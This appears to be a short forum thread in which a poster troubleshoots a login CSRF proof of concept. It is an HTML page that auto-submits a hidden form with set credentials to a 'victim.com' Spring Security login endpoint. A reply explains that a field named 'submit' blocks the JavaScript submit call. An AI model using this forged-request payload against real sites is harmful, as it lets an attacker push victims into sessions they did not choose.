Form submit via JS - CSRF
Uh oh. Looks like your using an ad blocker.
Our site is support by ads that help to pay our hosting costs. Please disable or whitelist us within your ad blocker to help us keep the site online.
All money generate by ads and donations is used to pay the hosting costs of the site, for more information about our income and expenses please see our donation page.
I'm banging my head here, maybe being stupid.. When I submit the following request it wont log me in. However, it logs me in when I use purely HTML
markup<input type="submit" value="Submit request" /> Also, when I submit different POST requests, JS submit works fine! :|
(ignore the PHP tags)
[php]<html> <body> <form action="https://victim.com/j_spring_security_check" method="POST"> <input type="hidden" name="j_username" value="email@example.com" /> <input type="hidden" name="j_password" value="Aa123456" /> <input type="hidden" name="submit" value="Sign In" /> </form> <script>document.forms.submit();</script> </body> </html> [/php]
lol there's a conflict between the parameter submit and submit() :D:D